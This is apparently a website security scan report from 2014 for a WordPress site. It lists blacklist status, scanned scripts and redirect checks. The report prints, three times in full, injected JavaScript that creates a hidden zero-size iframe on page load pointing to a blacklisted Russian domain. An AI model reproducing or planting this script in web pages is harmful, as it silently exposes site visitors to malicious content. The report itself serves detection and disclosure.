Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=westststudios.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://westststudios.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://westststudios.com/ | 200 OK Content-Length: 66399 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('wowyup');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="wowyup";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function dwdopq4(){create_frame("http://rabiorik.ru/lslgfai.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',dwdopq4)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();dwdopq4()};window.onload=newonload}else{window.onload=dwdopq4}}}catch(err){} Decoded script: function dwdopq4() { create_frame("http://rabiorik.ru/lslgfai.cgi?default"); } | ||
http://westststudios.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://westststudios.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/LayerSlider/static/js/layerslider.kreaturamedia.jquery.js?ver=5.1.1 | 200 OK Content-Length: 57000 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/LayerSlider/static/js/greensock.js?ver=1.11.2 | 200 OK Content-Length: 52295 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/LayerSlider/static/js/layerslider.transitions.js?ver=5.1.1 | 200 OK Content-Length: 21095 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/google-calendar-events/js/jquery-qtip.js | 200 OK Content-Length: 38428 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/google-calendar-events/js/gce-script.js | 200 OK Content-Length: 1616 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.3.8&ver=3.9.2 | 200 OK Content-Length: 85185 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.3.8&ver=3.9.2 | 200 OK Content-Length: 101288 Content-Type: application/javascript | clean |
http://westststudios.com/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/javascript | clean |
http://westststudios.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9 | 200 OK Content-Length: 9630 Content-Type: application/javascript | clean |
http://westststudios.com//westststudios.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 01 Oct 2014 16:25:30 GMT Pragma: no-cache Location: http://westststudios.com/westststudios.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://westststudios.com/xmlrpc.php | clean |
http://westststudios.com/westststudios.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/ | 404 Not Found Content-Length: 44548 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('wep4q4');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="wep4q4";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function dtsqxlx(){create_frame("http://rabiorik.ru/lrkabzb.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',dtsqxlx)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();dtsqxlx()};window.onload=newonload}else{window.onload=dtsqxlx}}}catch(err){} Decoded script: function dtsqxlx() { create_frame("http://rabiorik.ru/lrkabzb.cgi?default"); } | ||
http://westststudios.com//westststudios.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 01 Oct 2014 16:25:34 GMT Pragma: no-cache Location: http://westststudios.com/westststudios.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://westststudios.com/xmlrpc.php | clean |
http://westststudios.com/westststudios.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockui.min.js?ver=2.60/ | 404 Not Found Content-Length: 44554 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('5yt2');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="5yt2";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function c2o4i4j(){create_frame("http://rabiorik.ru/nygihic.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',c2o4i4j)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();c2o4i4j()};window.onload=newonload}else{window.onload=c2o4i4j}}}catch(err){} Decoded script: function c2o4i4j() { create_frame("http://rabiorik.ru/nygihic.cgi?default"); } |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: westststudios.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:25:16 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Link: <http://westststudios.com/>; rel=shortlink
X-Pingback: http://westststudios.com/xmlrpc.php
GET / HTTP/1.1
Host: westststudios.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:25:16 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Link: <http://westststudios.com/>; rel=shortlink
X-Pingback: http://westststudios.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: westststudios.com
Referer: http://www.google.com/search?q=westststudios.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: westststudios.com
Referer: http://www.google.com/search?q=westststudios.com
Result:
The result is similar to the first query. There are no suspicious redirects found.